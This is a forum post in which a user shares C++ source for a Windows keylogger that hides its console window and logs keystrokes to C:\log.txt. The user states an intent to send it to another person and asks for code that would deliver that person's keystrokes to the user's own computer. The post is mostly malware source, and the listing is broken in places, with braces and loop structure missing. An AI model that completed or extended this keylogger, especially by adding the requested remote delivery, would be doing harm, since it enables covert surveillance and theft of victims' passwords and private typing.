Hi guys, well after reading more about Win APIs i decided to learn how a simple keylogger work and i learned the function of every line in the code that i wrote. The simple keylogger that i wrote is in C++ and i did it in CodeBlocks, i compiled it and it works fine.But i got a problem.... the keylogger works and creates a log.txt file in C:\\ where the keys will be stored. That's cool yeah, but i want to send it to someone for example and it will create this log.txt file in his computer so i cant see the things inside the file. I want your help guys to add some code so it creates somekind of file in my computer where the keys would be sent so i can check all the info inside.
here is the code:
// KeyLogger por Lucas.... MixMix0305 !!!!!!!
#include <iostream>
#include <windows.h>
#include <fstream>
using namespace std;
int main()
//Variable que determinara cuando cerrar el keylogger...
bool aprete = true;
//Creamos y abrimos el fichero txt para escribir en el...
ofstream log;
log.open("C:\\log.txt", ofstream::out);
//SI ocurre algun error con el archivo
cout << "Error al abrir archivo log.txt en directorio raiz" << endl;
//Ocultamos la ventanita (consola)
HWND ocultar = FindWindow("ConsoleWindowClass",NULL);
//Inicia el ciclo
//Cuando se apriete una de las teclas, escribimos en el archivo de texto la tecla pulsada...
if (GetAsyncKeyState(VK_SPACE) == -32767){
log << " ";
if (GetAsyncKeyState('A') == -32767){
log << "A";
if (GetAsyncKeyState('B') == -32767){
log << "B";
if (GetAsyncKeyState('C') == -32767){
log << "C";
if (GetAsyncKeyState('D') == -32767){
log << "D";
if (GetAsyncKeyState('E') == -32767){
log << "E";
if (GetAsyncKeyState('F') == -32767){
log << "F";
if (GetAsyncKeyState('G') == -32767){
log << "G";
if (GetAsyncKeyState('H') == -32767){
log << "H";
if (GetAsyncKeyState('I') == -32767){
log << "I";
if (GetAsyncKeyState('J') == -32767){
log << "J";
if (GetAsyncKeyState('K') == -32767){
log << "K";
if (GetAsyncKeyState('L') == -32767){
log << "L";
if (GetAsyncKeyState('M') == -32767){
log << "M";
if (GetAsyncKeyState('N') == -32767){
log << "N";
if (GetAsyncKeyState(VK_CAPITAL) == -32767){
log << " Mayus-";
if (GetAsyncKeyState(VK_BACK) == -32767){
log << " BACKSPACE ";
if (GetAsyncKeyState('O') == -32767){
log << "O";
if (GetAsyncKeyState('P') == -32767){
log << "P";
if (GetAsyncKeyState('Q') == -32767){
log << "Q";
if (GetAsyncKeyState('R') == -32767){
log << "R";
if (GetAsyncKeyState('S') == -32767){
log << "S";
if (GetAsyncKeyState('T') == -32767){
log << "T";
if (GetAsyncKeyState('U') == -32767){
log << "U";
if (GetAsyncKeyState('V') == -32767){
log << "V";
if (GetAsyncKeyState('W') == -32767){
log << "W";
if (GetAsyncKeyState('X') == -32767){
log << "X";
if (GetAsyncKeyState('Y') == -32767){
log << "Y";
if (GetAsyncKeyState('Z') == -32767){
log << "Z";
if (GetAsyncKeyState(VK_RETURN) == -32767){
log << endl;
if (GetAsyncKeyState('1') == -32767){
log << "1";
if (GetAsyncKeyState('2') == -32767){
log << "2";
if (GetAsyncKeyState('3') == -32767){
log << "3";
if (GetAsyncKeyState('4') == -32767){
log << "4";
if (GetAsyncKeyState('5') == -32767){
log << "5";
if (GetAsyncKeyState('6') == -32767){
log << "6";
if (GetAsyncKeyState('7') == -32767){
log << "7";
if (GetAsyncKeyState('8') == -32767){
log << "8";
if (GetAsyncKeyState('9') == -32767){
log << "9";
if (GetAsyncKeyState(0) == -32767){
log << "0";
if (GetAsyncKeyState(VK_LSHIFT) == -32767){
log << " SHIFT-";
if (GetAsyncKeyState(VK_MENU) == -32767){
log << " ALT-";
if (GetAsyncKeyState(VK_F7) == -32767){
ShowWindow(ocultar,1); // Si aprietan F7 se detiene el keylogger...
aprete = false;
//Cerramos el archivo log.txt
//Una boludes para salir del programa..........
//cout << "----------------------------------" << endl << "ARCHIVO log.txt CREADO CON EXITO!" << endl;
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